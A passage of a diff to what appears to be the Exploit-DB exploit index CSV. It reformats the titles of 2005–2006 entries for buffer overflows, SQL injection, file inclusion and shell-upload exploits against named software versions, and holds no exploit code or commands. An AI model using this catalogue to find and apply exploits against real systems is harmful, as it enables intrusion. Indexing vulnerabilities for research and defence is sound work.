(Metasploit)",2005-08-12,anonymous,windows,remote,1761 1151,platforms/windows/remote/1151.pm,"MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow Exploit (Metasploit)",2005-08-12,anonymous,windows,remote,143 1152,platforms/windows/remote/1152.pm,"Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit)",2005-08-12,anonymous,windows,remote,8008 -1153,platforms/hardware/dos/1153.pl,"Grandstream Budge Tone 101/102 VOIP Phone Denial of Service",2005-08-12,"Pierre Kroma",hardware,dos,0 +1153,platforms/hardware/dos/1153.pl,"Grandstream Budge Tone 101/102 VOIP Phone - Denial of Service",2005-08-12,"Pierre Kroma",hardware,dos,0 1154,platforms/linux/local/1154.pl,"Operator Shell (osh) 1.7-13 - Local Root Exploit",2005-08-16,"Charles Stevenson",linux,local,0 1156,platforms/windows/dos/1156.c,"Chris Moneymakers World Poker Championship 1.0 - Denial of Service",2005-08-17,"Luigi Auriemma",windows,dos,0 1157,platforms/cgi/dos/1157.pl,"GTChat 0.95 Alpha - Remote Denial of Service",2005-08-18,RusH,cgi,dos,0 @@ -991,7 +991,7 @@ id,file,description,date,author,platform,type,port 1190,platforms/windows/remote/1190.c,"DameWare Mini Remote Control 4.0 < 4.9 - (Client Agent) Remote Exploit",2005-08-31,jpno5,windows,remote,6129 1191,platforms/php/webapps/1191.pl,"Simple PHP Blog 0.4.0 - Multiple Remote Exploits",2005-09-01,"Kenneth Belva",php,webapps,0 1192,platforms/windows/dos/1192.cpp,"P2P Pro 1.0 - (command) Denial of Service",2005-09-02,basher13,windows,dos,0 -1193,platforms/windows/remote/1193.pl,"Free SMTP Server 2.2 Spam Filter",2005-09-02,basher13,windows,remote,0 +1193,platforms/windows/remote/1193.pl,"Free SMTP Server 2.2 - Spam Filter",2005-09-02,basher13,windows,remote,0 1194,platforms/cgi/webapps/1194.c,"man2web 0.88 - Multiple Remote Command Execution Exploit (update2)",2005-09-04,tracewar,cgi,webapps,0 1196,platforms/linux/dos/1196.c,"CUPS Server 1.1 - (Get Request) Denial of Service",2005-09-05,tracewar,linux,dos,0 1197,platforms/windows/local/1197.c,"Microsoft Windows - (keybd_event) Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0 @@ -1007,7 +1007,7 @@ id,file,description,date,author,platform,type,port 1210,platforms/windows/remote/1210.pm,"WebAdmin 2.0.4 - USER Buffer Overflow Exploit (Metasploit)",2005-09-11,y0,windows,remote,1000 1211,platforms/php/webapps/1211.pl,"PhpTagCool 1.0.3 - SQL Injection Attacks Exploit",2005-09-11,Megabyte,php,webapps,0 1212,platforms/windows/dos/1212.pl,"COOL! Remote Control 1.12 - Remote Denial of Service",2005-09-11,basher13,windows,dos,0 -1213,platforms/multiple/dos/1213.c,"Snort 2.4.0 SACK TCP Option Error Handling Denial of Service",2005-09-12,nitr0us,multiple,dos,0 +1213,platforms/multiple/dos/1213.c,"Snort 2.4.0 - SACK TCP Option Error Handling Denial of Service",2005-09-12,nitr0us,multiple,dos,0 1214,platforms/php/webapps/1214.php,"AzDGDatingLite 2.1.3 - Remote Code Execution Exploit",2005-09-13,rgod,php,webapps,0 1215,platforms/linux/local/1215.c,"Wireless Tools 26 - (iwconfig) Local Root Exploit (some setuid)",2005-09-14,Qnix,linux,local,0 1217,platforms/php/webapps/1217.pl,"phpWebSite 0.10.0 - (module) SQL Injection",2005-09-15,RusH,php,webapps,0 @@ -1024,7 +1024,7 @@ id,file,description,date,author,platform,type,port 1229,platforms/linux/local/1229.sh,"Qpopper 4.0.8 - (poppassd) Local Root Exploit (Linux)",2005-09-24,kingcope,linux,local,0 1230,platforms/bsd/local/1230.sh,"Qpopper 4.0.8 - (poppassd) Local Root Exploit (freebsd)",2005-09-24,kingcope,bsd,local,0 1231,platforms/linux/remote/1231.pl,"WzdFTPD 0.5.4 - Remote Command Execution Exploit",2005-09-24,kingcope,linux,remote,21 -1232,platforms/linux/remote/1232.c,"RealPlayer/Helix Player Remote Format String Exploit (linux)",2005-09-26,c0ntex,linux,remote,0 +1232,platforms/linux/remote/1232.c,"RealPlayer/Helix Player - Remote Format String Exploit (linux)",2005-09-26,c0ntex,linux,remote,0 1233,platforms/multiple/dos/1233.html,"Mozilla Firefox 1.0.7 - Integer Overflow Denial of Service",2005-09-26,"Georgi Guninski",multiple,dos,0 1234,platforms/bsd/remote/1234.c,"GNU Mailutils imap4d 0.6 - (search) Remote Format String Exploit (fbsd)",2005-09-26,"Angelo Rosiello",bsd,remote,143 1235,platforms/windows/dos/1235.c,"MultiTheftAuto 0.5 patch 1 Server Crash and MOTD Deletion Exploit",2005-09-26,"Luigi Auriemma",windows,dos,0 @@ -1035,7 +1035,7 @@ id,file,description,date,author,platform,type,port 1240,platforms/php/webapps/1240.php,"Utopia News Pro 1.1.3 - (news.php) SQL Injection",2005-10-06,rgod,php,webapps,0 1241,platforms/php/webapps/1241.php,"Cyphor 0.19 - (board takeover) SQL Injection",2005-10-08,rgod,php,webapps,0 1242,platforms/linux/remote/1242.pl,"xine-lib 1.1 - (media player library) Remote Format String Exploit",2005-10-10,"Ulf Harnhammar",linux,remote,0 -1243,platforms/windows/remote/1243.c,"CA iGateway (debug mode) Remote Buffer Overflow Exploit",2005-10-10,egm,windows,remote,5250 +1243,platforms/windows/remote/1243.c,"CA iGateway - (debug mode) Remote Buffer Overflow Exploit",2005-10-10,egm,windows,remote,5250 1244,platforms/php/webapps/1244.pl,"phpMyAdmin 2.6.4-pl1 - Remote Directory Traversal Exploit",2005-10-10,cXIb8O3,php,webapps,0 1245,platforms/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 - (board takeover) SQL Injection",2005-10-10,rgod,php,webapps,0 1246,platforms/windows/dos/1246.pl,"RBExplorer 1.0 - (Hijacking Command) Denial of Service",2005-10-11,basher13,windows,dos,0 @@ -1050,7 +1050,7 @@ id,file,description,date,author,platform,type,port 1256,platforms/multiple/dos/1256.pl,"Lynx 2.8.6dev.13 - Remote Buffer Overflow Exploit (PoC)",2005-10-17,"Ulf Harnhammar",multiple,dos,0 1257,platforms/multiple/dos/1257.html,"Mozilla (Firefox 1.0.7) (Mozilla 1.7.12) - Denial of Service",2005-10-17,Kubbo,multiple,dos,0 1258,platforms/linux/remote/1258.php,"e107 <= 0.6172 - (resetcore.php) SQL Injection",2005-10-18,rgod,linux,remote,0 -1259,platforms/hp-ux/remote/1259.pm,"HP-UX FTP Server - Preauthentication Directory Listing Exploit (Metasploit)",2005-10-19,Optyx,hp-ux,remote,0 +1259,platforms/hp-ux/remote/1259.pm,"HP-UX FTP Server - Pre-Authentication Directory Listing Exploit (Metasploit)",2005-10-19,Optyx,hp-ux,remote,0 1260,platforms/windows/remote/1260.pm,"Microsoft Windows IIS - SA WebAgent 5.2/5.3 Redirect Overflow Exploit (Metasploit)",2005-10-19,"H D Moore",windows,remote,80 1261,platforms/hp-ux/remote/1261.pm,"HP-UX 11.11 - lpd Remote Command Execution Exploit (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515 1262,platforms/windows/remote/1262.pm,"CA Unicenter 3.1 - CAM log_security() Stack Overflow Exploit (Metasploit)",2005-10-19,"H D Moore",windows,remote,4105 @@ -1095,7 +1095,7 @@ id,file,description,date,author,platform,type,port 1313,platforms/windows/remote/1313.c,"Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote Exploit (3)",2005-11-11,xort,windows,remote,0 1314,platforms/linux/remote/1314.rb,"Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote Exploit (4)",2005-11-11,xwings,linux,remote,0 1315,platforms/php/webapps/1315.php,"XOOPS (wfdownloads) 2.05 Module - Multiple Vulnerabilities",2005-11-12,rgod,php,webapps,0 -1316,platforms/linux/local/1316.pl,"Veritas Storage Foundation 4.0 VCSI18N_LANG Local Overflow Exploit",2005-11-12,"Kevin Finisterre",linux,local,0 +1316,platforms/linux/local/1316.pl,"Veritas Storage Foundation 4.0 - VCSI18N_LANG Local Overflow Exploit",2005-11-12,"Kevin Finisterre",linux,local,0 1317,platforms/php/webapps/1317.py,"Coppermine Photo Gallery 1.3.2 - File Retrieval SQL Injection",2005-11-13,DiGiTAL_MiDWAY,php,webapps,0 1319,platforms/php/webapps/1319.php,"Unclassified NewsBoard 1.5.3 Patch 3 - Blind SQL Injection",2005-11-14,rgod,php,webapps,0 1320,platforms/php/webapps/1320.txt,"Arki-DB 1.0 - (catid) SQL Injection",2005-11-14,Devil-00,php,webapps,0 @@ -1115,7 +1115,7 @@ id,file,description,date,author,platform,type,port 1337,platforms/php/webapps/1337.php,"Mambo 4.5.2 - Globals Overwrite / Remote Command Execution Exploit",2005-11-22,rgod,php,webapps,0 1338,platforms/hardware/dos/1338.pl,"Cisco PIX - Spoofed TCP SYN Packets Remote Denial of Service",2005-11-23,"Janis Vizulis",hardware,dos,0 1339,platforms/windows/dos/1339.c,"FreeFTPD 1.0.10 - (PORT Command) Denial of Service",2005-11-24,"Stefan Lochbihler",windows,dos,0 -1340,platforms/php/webapps/1340.php,"eFiction 2.0 Fake GIF Shell Upload Exploit",2005-11-25,rgod,php,webapps,0 +1340,platforms/php/webapps/1340.php,"eFiction 2.0 - Fake .GIF Shell Upload Exploit",2005-11-25,rgod,php,webapps,0 1341,platforms/windows/dos/1341.c,"Microsoft Windows - MSDTC Service Remote Memory Modification PoC (MS05-051)",2005-11-27,darkeagle,windows,dos,0 1342,platforms/php/webapps/1342.php,"Guppy 4.5.9 - (REMOTE_ADDR) Remote Commands Execution Exploit",2005-11-28,rgod,php,webapps,0 1343,platforms/windows/dos/1343.c,"Microsoft Windows Metafile - (gdi32.dll) Denial of Service (MS05-053)",2005-11-29,"Winny Thomas",windows,dos,0 @@ -1123,7 +1123,7 @@ id,file,description,date,author,platform,type,port 1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - (mtNoObjects) Denial of Service (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 - (phgrafx) Local Buffer Overflow Exploit (x86)",2005-11-30,"p. minervini",qnx,local,0 1352,platforms/windows/remote/1352.cpp,"Microsoft Windows - DTC Remote Exploit (PoC) (MS05-051) (2)",2005-12-01,Swan,windows,remote,0 -1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple PreAuth Remote Stack Overflow PoC",2005-12-02,Sowhat,windows,dos,0 +1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple Pre-Auth Remote Stack Overflow PoC",2005-12-02,Sowhat,windows,dos,0 1354,platforms/php/webapps/1354.php,"Zen Cart 1.2.6d - (password_forgotten.php) SQL Injection",2005-12-02,rgod,php,webapps,0 1355,platforms/linux/remote/1355.pl,"sobexsrv 1.0.0_pre3 Bluetooth - syslog() Remote Format String Exploit",2005-12-03,"Kevin Finisterre",linux,remote,0 1356,platforms/php/webapps/1356.php,"DoceboLms 2.0.4 - connector.php Shell Upload Exploit",2005-12-04,rgod,php,webapps,0 @@ -1187,7 +1187,7 @@ id,file,description,date,author,platform,type,port 1418,platforms/asp/webapps/1418.txt,"MiniNuke 1.8.2 - Multiple SQL Injection",2006-01-14,nukedx,asp,webapps,0 1419,platforms/asp/webapps/1419.pl,"MiniNuke 1.8.2 - (news.asp hid) SQL Injection",2006-01-14,DetMyl,asp,webapps,0 1420,platforms/windows/remote/1420.c,"Microsoft Windows - Metafile (WMF) Remote File Download Exploit Generator",2006-01-15,darkeagle,windows,remote,0 -1421,platforms/windows/remote/1421.cpp,"Veritas NetBackup 4/5 Volume Manager Daemon Remote BoF Exploit",2006-01-16,"Patrick Thomassen",windows,remote,13701 +1421,platforms/windows/remote/1421.cpp,"Veritas NetBackup 4/5 - Volume Manager Daemon Remote BoF Exploit",2006-01-16,"Patrick Thomassen",windows,remote,13701 1422,platforms/windows/dos/1422.c,"Cerberus FTP Server 2.32 - Denial of Service",2006-01-16,pi3ch,windows,dos,0 1423,platforms/windows/dos/1423.html,"Microsoft Internet Explorer 6.x - (IMG / XML elements) Denial of Service",2006-01-18,"Inge Henriksen",windows,dos,0 1424,platforms/windows/dos/1424.pl,"Tftpd32 2.81 - (GET Request) Format String Denial of Service PoC",2006-01-19,"Critical Security",windows,dos,0 @@ -1195,7 +1195,7 @@ id,file,description,date,author,platform,type,port 1442,platforms/php/webapps/1442.pl,"ezDatabase 2.0 - (db_id) Remote Command Execution Exploit",2006-01-22,cijfer,php,webapps,0 1445,platforms/linux/local/1445.c,"Eterm LibAST < 0.7 - (-X Option) Local Privilege Escalation Exploit",2006-01-24,"Johnny Mast",linux,local,0 1446,platforms/php/webapps/1446.pl,"creLoaded 6.15 - (HTMLAREA) Automated Perl Exploit",2006-01-24,kaneda,php,webapps,0 -1447,platforms/hardware/dos/1447.c,"Cisco Aironet Wireless Access Points Memory Exhaustion ARP Attack DoS",2006-01-25,Pasv,hardware,dos,0 +1447,platforms/hardware/dos/1447.c,"Cisco Aironet Wireless Access Points - Memory Exhaustion ARP Attack DoS",2006-01-25,Pasv,hardware,dos,0 1448,platforms/windows/remote/1448.pl,"Sami FTP Server 2.0.1 - Remote Stack Based Buffer Overflow PoC",2006-01-25,"Critical Security",windows,remote,0 1449,platforms/linux/local/1449.c,"SquirrelMail 3.1 - Change Passwd Plugin Local Buffer Overflow Exploit",2006-01-25,"rod hedor",linux,local,0 1452,platforms/windows/remote/1452.pm,"Sami FTP Server 2.0.1 - Remote Buffer Overflow Exploit (Metasploit)",2006-01-25,redsand,windows,remote,21 @@ -1225,7 +1225,7 @@ id,file,description,date,author,platform,type,port 1479,platforms/qnx/local/1479.sh,"QNX Neutrino 6.2.1 - (phfont) Race Condition Local Root Exploit",2006-02-08,kokanin,qnx,local,0 1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (OSX) (Metasploit)",2006-02-08,"H D Moore",osx,remote,0 1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 - Insecure rc.local Permissions Plus System Crash Exploit",2006-02-08,kokanin,qnx,local,0 -1482,platforms/php/webapps/1482.php,"SPIP 1.8.2g Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 +1482,platforms/php/webapps/1482.php,"SPIP 1.8.2g - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server 1.6 (Non Steam) - Denial of Service",2006-02-11,Firestorm,multiple,dos,0 1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager connector.php) Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0 1485,platforms/php/webapps/1485.php,"RunCMS 1.2 - (class.forumposts.php) Arbitrary Remote Inclusion Exploit",2006-02-09,rgod,php,webapps,0 @@ -1283,11 +1283,11 @@ id,file,description,date,author,platform,type,port 1539,platforms/php/webapps/1539.txt,"MyBulletinBoard (MyBB) 1.03 - (misc.php COMMA) SQL Injection",2006-02-28,Devil-00,php,webapps,0 1540,platforms/bsd/dos/1540.pl,"FreeBSD 6.0 - (nfsd) Remote Kernel Panic Denial of Service",2006-02-28,"Evgeny Legerov",bsd,dos,0 1541,platforms/php/webapps/1541.pl,"Limbo CMS 1.0.4.2 - (ItemID) Remote Code Execution Exploit",2006-03-01,str0ke,php,webapps,0 -1542,platforms/php/webapps/1542.pl,"phpRPC Library 0.7 XML Data Decoding Remote Code Execution",2006-03-01,LorD,php,webapps,0 +1542,platforms/php/webapps/1542.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution",2006-03-01,LorD,php,webapps,0 1543,platforms/php/webapps/1543.pl,"vuBB 0.2 - (Cookie) Final SQL Injection Exploit (mq=off)",2006-03-01,KingOfSka,php,webapps,0 1544,platforms/php/webapps/1544.pl,"Woltlab Burning Board 2.x - Datenbank MOD (fileid) SQL Injection",2006-03-01,nukedx,php,webapps,0 1545,platforms/osx/local/1545.pl,"Apple Mac OS X - (/usr/bin/passwd) Custom Passwd Local Root Exploit",2006-03-01,vade79,osx,local,0 -1546,platforms/php/webapps/1546.pl,"phpRPC Library 0.7 XML Data Decoding Remote Code Execution (2)",2006-03-02,cijfer,php,webapps,0 +1546,platforms/php/webapps/1546.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (2)",2006-03-02,cijfer,php,webapps,0 1547,platforms/php/webapps/1547.txt,"Aztek Forum 4.00 - (XSS/SQL) Multiple Vulnerabilities (PoC)",2006-03-02,lorenzo,php,webapps,0 1548,platforms/php/webapps/1548.pl,"MyBulletinBoard (MyBB) 1.04 - (misc.php COMMA) SQL Injection (2)",2006-03-03,Devil-00,php,webapps,0 1549,platforms/php/webapps/1549.php,"PHP-Stats 0.1.9.1 - Remote Commands Execution Exploit",2006-03-04,rgod,php,webapps,0 @@ -1376,8 +1376,8 @@ id,file,description,date,author,platform,type,port 1634,platforms/linux/dos/1634.pl,"mpg123 0.59r Malformed mp3 - (SIGSEGV) Proof of Concept",2006-04-02,nitr0us,linux,dos,0 1640,platforms/php/webapps/1640.pl,"AngelineCMS 0.8.1 - (installpath) Remote File Inclusion Exploit",2006-04-04,K-159,php,webapps,0 1641,platforms/linux/dos/1641.pl,"Libxine 1.14 MPEG Stream Buffer Overflow PoC",2006-04-04,"Federico L. Bossi Bonin",linux,dos,0 -1642,platforms/windows/dos/1642.c,"Ultr@VNC 1.0.1 VNCLog::ReallyPrint Remote Buffer Overflow PoC",2006-04-04,"Luigi Auriemma",windows,dos,0 -1643,platforms/windows/dos/1643.c,"Ultr@VNC 1.0.1 client Log::ReallyPrint Buffer Overflow PoC",2006-04-04,"Luigi Auriemma",windows,dos,0 +1642,platforms/windows/dos/1642.c,"Ultr@VNC 1.0.1 - VNCLog::ReallyPrint Remote Buffer Overflow PoC",2006-04-04,"Luigi Auriemma",windows,dos,0 +1643,platforms/windows/dos/1643.c,"Ultr@VNC 1.0.1 - client Log::ReallyPrint Buffer Overflow PoC",2006-04-04,"Luigi Auriemma",windows,dos,0 1644,platforms/php/webapps/1644.pl,"INDEXU 5.0.1 - (base_path) Remote File Inclusion Exploit",2006-04-04,K-159,php,webapps,0 1645,platforms/php/webapps/1645.pl,"Crafty Syntax Image Gallery 3.1g - Remote Code Execution Exploit",2006-04-04,undefined1_,php,webapps,0 1646,platforms/php/webapps/1646.php,"phpMyChat 0.14.5 - (SYS enter) Remote Code Execution Exploit",2006-04-05,rgod,php,webapps,0 @@ -1395,14 +1395,14 @@ id,file,description,date,author,platform,type,port 1661,platforms/php/webapps/1661.pl,"phpBB 2.0.19 - (user_sig_bbcode_uid) Remote Code Execution Exploit",2006-04-10,RusH,php,webapps,0 1662,platforms/php/webapps/1662.php,"Clansys 1.1 (showid) - SQL Injection",2006-04-10,snatcher,php,webapps,0 1663,platforms/php/webapps/1663.php,"Simplog 0.9.2 - (s) Remote Commands Execution Exploit",2006-04-11,rgod,php,webapps,0 -1664,platforms/windows/remote/1664.py,"Ultr@VNC 1.0.1 client Log::ReallyPrint Buffer Overflow Exploit",2006-04-11,"Paul Haas",windows,remote,0 +1664,platforms/windows/remote/1664.py,"Ultr@VNC 1.0.1 - client Log::ReallyPrint Buffer Overflow Exploit",2006-04-11,"Paul Haas",windows,remote,0 1665,platforms/php/webapps/1665.pl,"Sphider 1.3 - (configset.php) Arbitrary Remote Inclusion Exploit",2006-04-12,rgod,php,webapps,0 1666,platforms/php/webapps/1666.php,"PHP121 Instant Messenger 1.4 - Remote Code Execution Exploit",2006-04-12,rgod,php,webapps,0 1667,platforms/multiple/dos/1667.html,"Mozilla Firefox 1.5.0.1 / Camino 1.0 - Null Pointer Dereference Crash",2006-04-13,BuHa,multiple,dos,0 1668,platforms/php/webapps/1668.php,"vBulletin ImpEx 1.74 - Remote Command Execution Exploit",2006-04-13,ReZEN,php,webapps,0 1669,platforms/cgi/webapps/1669.pl,"Censtore 7.3.x - (censtore.cgi) Remote Command Execution Exploit",2006-04-13,FOX_MULDER,cgi,webapps,0 1670,platforms/cgi/webapps/1670.pl,"quizz 1.01 - (quizz.pl) Remote Command Execution Exploit",2006-04-13,FOX_MULDER,cgi,webapps,0 -1671,platforms/multiple/dos/1671.c,"panic-reloaded TCP Denial of Service Tool",2006-04-13,hash,multiple,dos,0 +1671,platforms/multiple/dos/1671.c,"panic-reloaded - TCP Denial of Service Tool",2006-04-13,hash,multiple,dos,0 1672,platforms/php/webapps/1672.pl,"PAJAX 0.5.1 - Remote Code Execution Exploit",2006-04-13,Stoney,php,webapps,0 1673,platforms/php/webapps/1673.php,"phpWebSite 0.10.2 - (hub_dir) Remote Commands Execution Exploit",2006-04-14,rgod,php,webapps,0 1674,platforms/php/webapps/1674.txt,"osCommerce 2.2 - (extras) Source Code Disclosure",2006-04-14,rgod,php,webapps,0 @@ -1570,7 +1570,7 @@ id,file,description,date,author,platform,type,port 1859,platforms/asp/webapps/1859.htm,"aspWebLinks 2.0 - SQL Injection / Admin Pass Change Exploit",2006-06-01,ajann,asp,webapps,0 1860,platforms/php/webapps/1860.txt,"Bytehoard 2.1 - (server.php) Remote File Inclusion",2006-06-01,beford,php,webapps,0 1861,platforms/php/webapps/1861.txt,"Redaxo CMS 3.2 - (INCLUDE_PATH) Remote File Inclusion",2006-06-02,beford,php,webapps,0 -1862,platforms/cgi/webapps/1862.c,"iShopCart vGetPost() Remote Buffer Overflow Exploit (cgi)",2006-06-02,K-sPecial,cgi,webapps,0 +1862,platforms/cgi/webapps/1862.c,"iShopCart - vGetPost() Remote Buffer Overflow Exploit (cgi)",2006-06-02,K-sPecial,cgi,webapps,0 1863,platforms/php/webapps/1863.txt,"Igloo 0.1.9 - (Wiki.php) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0 1864,platforms/php/webapps/1864.txt,"ashNews 0.83 - (pathtoashnews) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0 1865,platforms/php/webapps/1865.txt,"Informium 0.12.0 - (common-menu.php) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0 @@ -1672,7 +1672,7 @@ id,file,description,date,author,platform,type,port 1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module - (lid) SQL Injection",2006-06-28,KeyCoder,php,webapps,0 1962,platforms/osx/local/1962.pl,"Mac OS X 10.4.6 - (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0 1963,platforms/php/webapps/1963.txt,"GeekLog 1.4.0sr3 - (_CONF[path]) Remote File Inclusion",2006-06-29,Kw3[R]Ln,php,webapps,0 -1964,platforms/php/webapps/1964.php,"GeekLog 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0 +1964,platforms/php/webapps/1964.php,"GeekLog 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution",2006-06-29,rgod,php,webapps,0 1965,platforms/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025) (Metasploit)",2006-06-29,Pusscat,windows,remote,445 1967,platforms/windows/dos/1967.c,"Microsoft Windows - TCP/IP Protocol Driver Remote Buffer Overflow Exploit",2006-06-30,Preddy,windows,dos,0 1968,platforms/php/webapps/1968.php,"DZCP (deV!L_z Clanportal) 1.34 - (id) SQL Injection",2006-07-01,x128,php,webapps,0 @@ -1684,13 +1684,13 @@ id,file,description,date,author,platform,type,port 1974,platforms/php/webapps/1974.txt,"SmartSiteCMS 1.0 - (root) Multiple Remote File Inclusion",2006-07-01,CrAsh_oVeR_rIdE,php,webapps,0 1975,platforms/php/webapps/1975.pl,"BXCP 0.3.0.4 - (where) SQL Injection",2006-07-02,x23,php,webapps,0 1976,platforms/windows/dos/1976.cpp,"Quake 3 Engine Client - CG_ServerCommand() Remote Overflow Exploit",2006-07-02,RunningBon,windows,dos,0 -1977,platforms/windows/dos/1977.cpp,"Quake 3 Engine Client CS_ITEms Remote Overflow Exploit (Win32)",2006-07-02,RunningBon,windows,dos,0 +1977,platforms/windows/dos/1977.cpp,"Quake 3 Engine Client - CS_ITEms Remote Overflow Exploit (Win32)",2006-07-02,RunningBon,windows,dos,0 1978,platforms/windows/local/1978.pl,"Microsoft Excel - Universal Hlink Local Buffer Overflow Exploit",2006-07-02,"SYS 49152",windows,local,0 1980,platforms/windows/dos/1980.pl,"ImgSvr 0.6.5 - (long http post) Denial of Service",2006-07-04,n00b,windows,dos,0 1981,platforms/php/webapps/1981.txt,"galleria Mambo Module 1.0b - Remote File Inclusion",2006-07-04,sikunYuk,php,webapps,0 1982,platforms/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) - Remote File Inclusion",2006-07-04,OLiBekaS,php,webapps,0 1983,platforms/php/webapps/1983.txt,"MyPHP CMS 0.3 - (domain) Remote File Inclusion",2006-07-05,Kw3[R]Ln,php,webapps,0 -1984,platforms/windows/dos/1984.py,"WinRAR 3.60 beta 6 - (SFX Path) Stack Overflow Exploit PoC",2006-07-05,posidron,windows,dos,0 +1984,platforms/windows/dos/1984.py,"WinRAR 3.60 beta 6 - (SFX Path) Stack Overflow",2006-07-05,posidron,windows,dos,0 1985,platforms/windows/local/1985.py,"WinRAR 3.60 beta 6 - (SFX Path) Local Stack Overflow Exploit",2006-07-05,muts,windows,local,0 1986,platforms/windows/local/1986.cpp,"Microsoft Excel 2000/2003 - Hlink Local Buffer Overflow Exploit (French)",2006-07-06,NSRocket,windows,local,0 1987,platforms/asp/webapps/1987.txt,"Hosting Controller 6.1 Hotfix 3.1 - Privilege Escalation",2006-07-06,"Soroush Dalili",asp,webapps,0 @@ -1698,13 +1698,13 @@ id,file,description,date,author,platform,type,port 1989,platforms/windows/dos/1989.html,"Microsoft Internet Explorer 6 - Table.Frameset NULL Dereference",2006-07-07,"Aviv Raff",windows,dos,0 1990,platforms/windows/dos/1990.html,"Microsoft Internet Explorer 6 - (Internet.HHCtrl) Heap Overflow",2006-07-07,"H D Moore",windows,dos,0 1991,platforms/php/webapps/1991.php,"Pivot 1.30 RC2 - Privileges Escalation/Remote Code Execution Exploit",2006-07-07,rgod,php,webapps,0 -1992,platforms/windows/local/1992.py,"WinRAR 3.60 beta 6 - (SFX Path) Local Stack Overflow Exploit (French)",2006-07-07,"Jerome Athias",windows,local,0 +1992,platforms/windows/local/1992.py,"WinRAR 3.60 beta 6 - (SFX Path) Local Stack Overflow (French)",2006-07-07,"Jerome Athias",windows,local,0 1993,platforms/php/webapps/1993.php,"PAPOO 3_RC3 - SQL Injection/Admin Credentials Disclosure Exploit",2006-07-07,rgod,php,webapps,0 1994,platforms/php/webapps/1994.txt,"SimpleBoard Mambo Component 1.1.0 - Remote File Inclusion",2006-07-08,h4ntu,php,webapps,0 1995,platforms/php/webapps/1995.txt,"com_forum Mambo Component 1.2.4RC3 - Remote File Inclusion",2006-07-08,h4ntu,php,webapps,0 1996,platforms/php/webapps/1996.txt,"Sabdrimer PRO 2.2.4 - (pluginpath) Remote File Inclusion",2006-07-09,A.nosrati,php,webapps,0 1997,platforms/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit (PHP)",2006-07-09,joffer,multiple,remote,10000 -1998,platforms/php/webapps/1998.pl,"Ottoman CMS 1.1.3 - (default_path) Remote File Inclusion Exploit",2006-07-09,"Jacek Wlodarczyk",php,webapps,0 +1998,platforms/php/webapps/1998.pl,"Ottoman CMS 1.1.3 - (default_path) Remote File Inclusion",2006-07-09,"Jacek Wlodarczyk",php,webapps,0 1999,platforms/windows/local/1999.pl,"Microsoft Word 2000/2003 - Hlink Local Buffer Overflow Exploit PoC",2006-07-09,"SYS 49152",windows,local,0 2000,platforms/hardware/dos/2000.pl,"SIPfoundry sipXtapi - (CSeq) Remote Buffer Overflow Exploit PoC",2006-07-10,"Michael Thumann",hardware,dos,0 2001,platforms/windows/dos/2001.c,"Microsoft Word 2000/2003 - Unchecked Boundary Condition",2006-07-10,"naveed afzal",windows,dos,0 @@ -1757,7 +1757,7 @@ id,file,description,date,author,platform,type,port 2056,platforms/windows/local/2056.c,"Microsoft IIS ASP - Stack Overflow Exploit (MS06-034)",2006-07-21,cocoruder,windows,local,0 2057,platforms/windows/dos/2057.c,"Microsoft Windows - Mailslot Ring0 Memory Corruption Exploit (MS06-035)",2006-07-21,cocoruder,windows,dos,0 2058,platforms/php/webapps/2058.txt,"PHP Forge 3 beta 2 - (cfg_racine) Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0 -2059,platforms/hardware/dos/2059.cpp,"D-Link Router UPNP Stack Overflow Denial of Service (PoC)",2006-07-22,ub3rst4r,hardware,dos,0 +2059,platforms/hardware/dos/2059.cpp,"D-Link Router - UPNP Stack Overflow Denial of Service (PoC)",2006-07-22,ub3rst4r,hardware,dos,0 2060,platforms/php/webapps/2060.txt,"PHP Live! 3.2.1 - (help.php) Remote Inclusion",2006-07-23,magnific,php,webapps,0 2061,platforms/multiple/remote/2061.txt,"Apache Tomcat < 5.5.17 - Remote Directory Listing",2006-07-23,"ScanAlert Security",multiple,remote,0 2062,platforms/php/webapps/2062.txt,"MoSpray Mambo Component 18RC1 - Remote File Inclusion",2006-07-23,"Kurdish Security",php,webapps,0 @@ -1851,7 +1851,7 @@ id,file,description,date,author,platform,type,port 2153,platforms/php/webapps/2153.txt,"Boite de News 4.0.1 - (index.php) Remote File Inclusion",2006-08-09,"the master",php,webapps,0 2154,platforms/php/webapps/2154.txt,"PgMarket 2.2.3 - (CFG[libdir]) Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,0 2155,platforms/php/webapps/2155.txt,"See-Commerce 1.0.625 - (owimg.php3) Remote File Inclusion",2006-08-09,Drago84,php,webapps,0 -2156,platforms/hardware/dos/2156.c,"PocketPC Mms Composer 